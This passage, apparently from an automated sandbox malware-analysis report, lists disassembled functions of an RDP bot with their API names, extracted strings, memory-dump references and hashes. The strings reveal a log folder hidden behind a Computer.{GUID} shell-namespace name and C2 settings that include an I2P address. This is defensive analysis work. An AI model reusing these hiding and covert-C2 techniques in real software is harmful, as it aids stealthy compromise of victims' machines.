7ff8b9181292 1284->1294 1285->1284 1295 7ff8b918163f-7ff8b9181644 1286->1295 1296 7ff8b9181606-7ff8b918160b 1286->1296 1287->1273 1288->1277 1297 7ff8b9181623-7ff8b9181628 1288->1297 1289->1270 1291->1275 1292->1273 1293->1273 1294->1273 1302 7ff8b91816cd-7ff8b91816e7 call 7ff8b9181292 1294->1302 1295->1273 1296->1273 1297->1273 1302->1290
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                                                                                                                                                  • API String ID: 3395718042-1794035234
                                                                                                                                                  • Opcode ID: 8b2556d2579fb226d3b412aa444ad6ae0953bae4d5ef3f896a350effe941be9c
                                                                                                                                                  • Instruction ID: ace710477b1c52a3946b0cc539d886116048bd28471fdfb5dc040c43a8f0adef
                                                                                                                                                  • Opcode Fuzzy Hash: 8b2556d2579fb226d3b412aa444ad6ae0953bae4d5ef3f896a350effe941be9c
                                                                                                                                                  • Instruction Fuzzy Hash: 5A516092E0C7C381FA609F5DA8C03B91355AF067D4F9A8432DB4E06297DE6DA946F341
                                                                                                                                                  Function 00007FF8BFB5317C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                                                                                                                                                  • API String ID: 3395718042-2859552336
                                                                                                                                                  • Opcode ID: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
                                                                                                                                                  • Instruction ID: 2bdc8611c17d197b602f3bddae61beebac0a91e13cdcc8640771f7311e5a3bda
                                                                                                                                                  • Opcode Fuzzy Hash: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
                                                                                                                                                  • Instruction Fuzzy Hash: FE514012E1C707A2FA206BDDA8A43BC7352AF557C4F584032CB0D46BA2DEADB956C341
                                                                                                                                                  Function 00007FF8BFB3A3AC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                                                                                                                                                  • API String ID: 3395718042-190452282
                                                                                                                                                  • Opcode ID: 812d47fff8b64de28eadb4b284417ff33b11a0d1b38bd8777733dc5e58d56bcb
                                                                                                                                                  • Instruction ID: 2d20f89f9e0c9e8fa2aff76184fdd8466a244c1ee7e036864113a558b75bd565
                                                                                                                                                  • Opcode Fuzzy Hash: 812d47fff8b64de28eadb4b284417ff33b11a0d1b38bd8777733dc5e58d56bcb
                                                                                                                                                  • Instruction Fuzzy Hash: 9B517E55ECC60381FA24ABDCE9943B8A358AF057C4FA14132CB0E476A3DE6DF94AD301
                                                                                                                                                  Function 00007FF8BFB8143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                                                                                                                                                  • API String ID: 3395718042-315528054
                                                                                                                                                  • Opcode ID: 602e9c047fdca86cbadb0e5c23cdcfb60371812318e93288b996e6c907137449
                                                                                                                                                  • Instruction ID: f429e8a65ea131e304848889b0689bfcdaa34c7f643bb8ab0c88b0ac273ec320
                                                                                                                                                  • Opcode Fuzzy Hash: 602e9c047fdca86cbadb0e5c23cdcfb60371812318e93288b996e6c907137449
                                                                                                                                                  • Instruction Fuzzy Hash: 3E514960E1E70386FB649BDDE8903F82354AF897C4F548032DB4E466A7DE6CA996C341
                                                                                                                                                  Function 00007FF8BA4F8702 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  • Opcode ID: 931fbe224b6d1362edbcaa76613dba2ac2475fcda5323f9d284c0134768a3e7b
                                                                                                                                                  • Instruction ID: 8e3d2907986e33aaf9e9d339b7b2beee5e6b97830c643e186a79ff32b3fef841
                                                                                                                                                  • Opcode Fuzzy Hash: 931fbe224b6d1362edbcaa76613dba2ac2475fcda5323f9d284c0134768a3e7b
                                                                                                                                                  • Instruction Fuzzy Hash: C7A14361D0C74B81F630974CA8407B96250AF427C4F5421B7DF4E4AAA5EFBFEA85D342
                                                                                                                                                  Function 00007FF8B915B0E2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  • Opcode ID: 428d5fea51d9c1de1b694d77009b856a7566bb1f16a7a93045fe153b6cb68c6f
                                                                                                                                                  • Instruction ID: 81286e7b30b63b9601357d47c3967e613c629b40faa304e186c319f18425bd9b
                                                                                                                                                  • Opcode Fuzzy Hash: 428d5fea51d9c1de1b694d77009b856a7566bb1f16a7a93045fe153b6cb68c6f
                                                                                                                                                  • Instruction Fuzzy Hash: CDA14B60E8C78B81F6619F2CA9403B82254AF403C8F568133DB5E56695EFADF985F342
                                                                                                                                                  Function 00007FF8B9182472 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  • Opcode ID: 481f3edfdb410c9c7dbf8b9b942a96f2820c5aded1884b0906b34a899a34cc49
                                                                                                                                                  • Instruction ID: d0bca432a8c548f127ec2364f3478f1f2111b7f359857d154c8fb66883693118
                                                                                                                                                  • Opcode Fuzzy Hash: 481f3edfdb410c9c7dbf8b9b942a96f2820c5aded1884b0906b34a899a34cc49
                                                                                                                                                  • Instruction Fuzzy Hash: C6A17261D0C7C781FA229F4DA8C43782250AF117C4F924532DB1E476A7EE6DE986F342
                                                                                                                                                  Function 00007FF8BFB59702 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  • Opcode ID: add2c6f352bf346838c4181cb8fcec24f82c3f84547b9df47f0d9f61b9981692
                                                                                                                                                  • Instruction ID: b3667a72461a579f01bd083bdf02c04c75045806a1d4aa2408a1437682ba8800
                                                                                                                                                  • Opcode Fuzzy Hash: add2c6f352bf346838c4181cb8fcec24f82c3f84547b9df47f0d9f61b9981692
                                                                                                                                                  • Instruction Fuzzy Hash: 9EA1482190C74B91FA30ABCCE8617B9B350AF407C8F541132DB5E46BA1EEADF995D342
                                                                                                                                                  Function 00007FF8BFB37E42 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  • Opcode ID: a723a54cd343313568721d095f8a87cc706e6852ad108b433f86050c43f96ab7
                                                                                                                                                  • Instruction ID: e5c1d7d664418198a8bbfbdb749275de3dae995e80a703ad33e3d679bbd73c97
                                                                                                                                                  • Opcode Fuzzy Hash: a723a54cd343313568721d095f8a87cc706e6852ad108b433f86050c43f96ab7
                                                                                                                                                  • Instruction Fuzzy Hash: B2A14D629CCB4B91FA70ABCCAD013786354AF587C4F580132DB1E47695EEADE985D303
                                                                                                                                                  Function 00007FF8BFB8D6C2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  • Opcode ID: e0d0507b3a6c418314780e5cd595686b87934a5845e747169805726748d1ec43
                                                                                                                                                  • Instruction ID: 521b050ca184c651ed9dfebace145161b87e1e72b4d62eb84e868271a24a3956
                                                                                                                                                  • Opcode Fuzzy Hash: e0d0507b3a6c418314780e5cd595686b87934a5845e747169805726748d1ec43
                                                                                                                                                  • Instruction Fuzzy Hash: 28A14921A0C74B91FB60ABCCE8403B97351AF887C4F544133CB4E46697EEADE985C362
                                                                                                                                                  Function 00007FF8BFB83D25 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 180threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorLastThread
                                                                                                                                                  • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                                                                                                                                                  • API String ID: 1689873465-2891999747
                                                                                                                                                  • Opcode ID: 97be6b5ad07804f14644d956753ed9498501f368d80ed370f2936be80a530947
                                                                                                                                                  • Instruction ID: 38ad52acea5631fec55358683cf5caa898b0a6e3b83b17df0c577eb508ff775a
                                                                                                                                                  • Opcode Fuzzy Hash: 97be6b5ad07804f14644d956753ed9498501f368d80ed370f2936be80a530947
                                                                                                                                                  • Instruction Fuzzy Hash: 8C919362A0C74381FB209BDCE8847B92394AF843E4F589235C75E462E2DF7CE955C351
                                                                                                                                                  Function 00007FF6BE03227B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$fclosefopenfwrite
                                                                                                                                                  • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                                                                                                  • API String ID: 608220805-961576452
                                                                                                                                                  • Opcode ID: 1cb5eafd62267dfe483e8b9f6ab85db23e0a2ddce2e864eb0c2ab42da6a02e53
                                                                                                                                                  • Instruction ID: 2b372f662e107978dcc3a3b77d81683085512e4e524a60828b9d0055f14cf8a9
                                                                                                                                                  • Opcode Fuzzy Hash: 1cb5eafd62267dfe483e8b9f6ab85db23e0a2ddce2e864eb0c2ab42da6a02e53
                                                                                                                                                  • Instruction Fuzzy Hash: C0517C61A0964791FA209B5DEA00AB82371BFB8794F580133FB4E97294DE3CF9668301
                                                                                                                                                  Function 00007FF8BA4F42BE Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON
